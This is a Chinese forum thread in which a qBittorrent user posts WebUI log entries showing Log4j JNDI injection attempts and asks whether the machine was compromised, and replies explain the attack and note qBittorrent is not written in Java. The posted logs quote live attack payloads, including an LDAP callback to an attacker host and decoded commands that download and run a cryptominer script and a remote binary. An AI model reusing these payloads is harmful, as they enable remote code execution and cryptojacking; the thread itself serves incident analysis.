这是一个创建于 887 天前的主题,其中的信息可能已经有所发展或是发生改变。
在当前最新的 Windows qbittorrent 4.5.2 版本和 4.4.5 版本都遇到了来着这个 IP 的入侵。
对这些不太懂,唯一能做的是给日志里这段 base64 解了个码;日志末尾的 IP port 指代我的公网 IP 和 webUI 接口。
我的电脑是已成了矿机了吗,求分析,谢谢。
第一段 base64:curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 486xqw7y
2023-04-26 14:36 - WebUI: 请求 Header 中 Referer 与 XFH/Host 不匹配!来源 IP: '95.214.55.244'。Referer: 't('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')'。XFH/Host: 'IP:Port'
第二段 base64:wget http://107.172.206.114/.duck/lscpu ; curl -O http://107.172.206.114/.duck/lscpu ; chmod +x lscpu ; chmod 777 lscpu ; ./lscpu runner ; sudo ./lscpu runner ; rm -rf lscpu
2023-05-06 20:13 - WebUI: 请求 Header 中 Referer 与 XFH/Host 不匹配!来源 IP: '95.214.55.244'。Referer: 't('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY3VybCAtTyBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL2xzY3B1IDsgY2htb2QgK3ggbHNjcHUgOyBjaG1vZCA3NzcgbHNjcHUgOyAuL2xzY3B1IHJ1bm5lciA7IHN1ZG8gLi9sc2NwdSBydW5uZXIgOyBybSAtcmYgbHNjcHU=}')'。XFH/Host: 'IP:Port'
 | 1 leoleoleo 2023-05-09 16:22:20 +08:00  1 看日志,是尝试利用 Log4j 漏洞来给设备中上挖矿木马。是否利用成功,你需要看一下设备的资源占用,cpu 和内存是否有异常的标高,以及系统是否出现了异常的定时任务或者服务。 |
 | 2 0TSH60F7J2rVkg8t 2023-05-09 16:27:00 +08:00 1 理论上这是个利用 linux 漏洞攻击的代码,如果楼主是 windows 的话,应该不会中找。 |
 | 3 Lentin 2023-05-09 16:28:47 +08:00 1 |
 | 4 javashell 2023-05-09 16:49:40 +08:00 1 从日志上看是 log4j 库进行 jndi 注入攻击。 如果楼主的 qbittorrent webUI 使用的默认密码或使用的是弱密码,可以进行命令执行的(有次 ssh 配置改崩了,就是通过 qbittorrent 改回来的) |
 | 5 20160409 |
| 6 javashell 2023-05-09 17:07:28 +08:00 1 @20160409 qbittorrent 有个功能可以实现下载完成后执行指定的命令 ,叫 "Run external program on torrent completion" 可被用来进行挖矿、勒索等 ,最好是关闭 webui 访问 |
| 7 20160409 OP 形势应该还不严峻 > QBittorrent is C++, safe https://www.reddit.com/r/homelab/comments/recvfp/comment/ho78vfd/ ------------------- 拿火绒的 Log4j2 漏洞缓解工具扫描,返回结果: > [Error] Get JAVA_HOME path failed .. JAVA_HOME 都没配置好,应该利用不起来这个漏洞? [3> 如果出现如下日志,则需要排查 JAVA_HOME 环境变量是否正确配置 ----- CVE-2021-44228 漏洞缓解结果 ----- [Error] Get JAVA_HOME path failed .. 或者 ----- CVE-2021-44228 漏洞缓解结果 ----- [Error] Get Java version failed ..] https://bbs.huorong.cn/thread-96320-1-1.html |
 | 8 7h3d4wn 2023-05-09 18:56:42 +08:00 1 |
 | 9 tpxcer 2023-05-09 19:04:12 +08:00 via iPhone 怎么发现被入侵的?我现 24 小时开着,外网也直接能访问到,有点慌 |
 | 11 winsunz 2023-05-09 19:30:28 +08:00 吓得我赶紧关掉端口了 |
 | 12 webshe11 2023-05-09 19:35:05 +08:00 1 批量扫 Log4j CVE-2021-44228 漏洞的,qBT 的 Web 服务不是用 Java 写的,不受这个漏洞影响 但是做好访问控制,减少攻击面总没错 |
Select Language